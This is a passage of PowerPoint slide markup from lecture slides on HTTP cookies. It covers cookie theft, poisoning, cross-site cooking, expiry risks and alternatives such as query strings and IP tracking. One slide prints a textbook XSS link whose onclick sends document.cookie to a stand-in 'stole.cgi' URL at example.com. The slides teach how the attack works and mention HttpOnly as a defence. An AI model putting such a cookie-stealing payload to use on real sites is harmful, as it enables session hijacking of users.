              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2010D37-793D-478C-8086-4676E4F78B12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1952625" y="1357313"/>
            <a:ext cx="8229600" cy="5715000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cookie theft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The value of the cookie can be sent to other servers using means other than the header of a cookie, for example, scripting languages ​​such as JavaScript and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>JScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can access the values ​​of the cookies and have the ability to send arbitrary values ​​to the servers on the Internet (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> XSS: cross-site scripting)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> an attacker may post a message on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with the following link:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When a user clicks the link, the browser executes the code specified in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> replacing the string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with the list of active user cookies for that page. The list is sent to the server example.com and the attacker will be able to collect the user's cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attack is difficult to identify the user side because the script comes from the same domain that set the cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is the responsibility of the site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dell'amministratoire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> disable the posting of malicious code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies are not directly visible to the client-side JavaScript programs as if they were sent with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> flag (non-standard, not supported by all browsers)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66564" name="Rettangolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46549B55-5E98-4540-9577-CF894B920EBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2676526" y="3371851"/>
            <a:ext cx="75723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200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;a href="#" onclick="window.location='http://example.com/stole.cgi?text='+escape(document.cookie); return false;"&gt;Click here!&lt;/a&gt;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E52518E-2002-4A0C-9660-B4A4AE5A3EC9}"/>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Drawbacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> (5)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7165BA90-6033-4164-90E2-5E96E703CF06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cookie poisoning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An attacker could modify the values ​​of the cookies before you send them back to the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If a cookie contains the total to pay for items of a transaction, the risk is that an attacker could change this value and pay less than they should</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many websites fortunately only store a session identifier in the cookie itself, while the other sensitive data are stored on the server, is what puts protected from similar problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This attack is often used in combination with one </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>cookie theft </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cross-site cooking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enables malicious websites to modify cookies from other sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Similar to cookie poisoning, but the attacker uses normal users who have some vulnerability in the browser, instead of directly attacking the site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The goal is often realize </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>session fixation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(stolen session ID)</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" u="sng"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4C25CBB-8B14-438C-A393-C0921DDAAEF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000"/>
              <a:t>General format</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15363" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2194335-33C7-4816-93A2-504AF2FEA1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4775" y="1649413"/>
            <a:ext cx="7512050" cy="377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3150B12-7AEB-4B91-ADAF-8C55FD3688FA}"/>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Drawbacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> (6)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB0E8BCB-2D43-4E78-812A-DA5CA0E0AF7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Inconsistent state on client and server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>generate an inconsistency between the state of the client and the state as stored in the cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the user acquires a cookie and then clicks the "Back" button of the browser, the state on the browser is generally not the same as before that acquisition, but for example the content of the cart may not change; this might not be the intention of the user and can lead to confusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cookie expiry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Persistent cookies </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A persistent cookie captured can be used to simulate a user for a considerable period of time, in the case of session hijacking</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"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olo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{767B183A-DABA-4DAE-B50B-822FF23031FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1"/>
              <a:t>Alternatives to cookies</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{970086D7-B1AF-4907-82B8-B92F9D888CDE}"/>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en-US" b="1" dirty="0"/>
              <a:t>IP address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some users may be tracked based on the IP address of the computer requesting the page </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The mechanism is less reliable than that of a cookie to identify a user because computers and proxies can be shared by multiple users, or as they may change from session to session.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It can work in the case of always-on broadband connections that keep the same IP for long periods of time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some systems, such as Tor, are designed to ensure anonymity on the Internet and make this impractical.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"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olo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC174339-6050-4620-A3E2-C341227EA9FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1"/>
              <a:t>Alternatives to cookies</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D17220E-C674-43D9-B885-C73013C28798}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981201" y="1600201"/>
            <a:ext cx="8043863" cy="4543425"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>URL (query string)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Embedding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>into</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>URLs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web server appending query strings to the links of a Web page it holds when sending it to a browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When the user follows a link, the browser returns the attached query string to the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a query string is part of a URL, if that URL is later reused, the same attached piece of information is sent to the server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>even if the same user accesses the same page two times, there is no guarantee that the same query string is used in both views. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Storing data that identifies a session in a query string enables or simplifies session fixation attacks,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>referrer logging attacks and other security exploits. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT"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olo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD64ECBE-ECD4-4F47-981F-9E86368F6F9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1"/>
              <a:t>Alternatives to cookies</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0097F0C5-6FF5-49D3-B4F1-23F9475FD065}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Hidden form fields</a:t>
            </a:r>
